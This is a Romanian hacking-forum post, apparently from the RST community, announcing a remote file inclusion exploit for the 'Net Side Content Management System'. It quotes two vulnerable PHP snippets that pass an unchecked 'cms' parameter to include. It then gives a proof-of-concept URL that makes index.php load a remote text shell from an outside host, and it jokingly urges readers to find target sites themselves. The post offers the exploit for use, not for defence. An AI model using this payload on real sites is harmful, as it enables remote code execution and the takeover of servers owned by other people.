Jump to content
Guest flama

Net Side Content Management System RFI

Recommended Posts

Guest flama
Posted

vad ca se doarme in post asha ca o sa va postez eu un nou exploit RFI ... nu e cine shtie ce dar ... have fun (scz ca e scris in engleza dar vroiam sa il postez pe milw0rm mai intai ...):


I see your future and your future is death. Sharingan !
--------------------------------------------------------------------------------------------------------------


script name :

Net Side Content Management System
(2 versions found both vulnerable | Version names not available since the script isn't downloadable)


vuln file :

index.php |and maybe others ... haven't checked|

vuln code version 1:

[...]
if ($_GET["cms"] == "" or $_GET["cms"] == "titel")
{
include "titel.inc.php";
}
else
{
include $_GET["cms"].".inc.php";
[...]
vuln code version 2:

[...]
$includepath = "";
[...]
if ($_GET["cms"] == "")
{
include $includepath."titel.inc.php";
}
else
{
include $includepath.$_GET["cms"].".inc.php";
[...]


proof of concept :

[url]http://site.com/index.php?cms=http://whatever.com/textshell.txt?[/url]

dork :

Think bitches THINK!
--------------------------------------------------------------------------------------------------------------

greetz mozi and all php freaks.
oh yeah and a friendly Hi! to RST.

vad ca forumu imi transforma din ; ) in ;) deshi l'am postat cu code :|

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...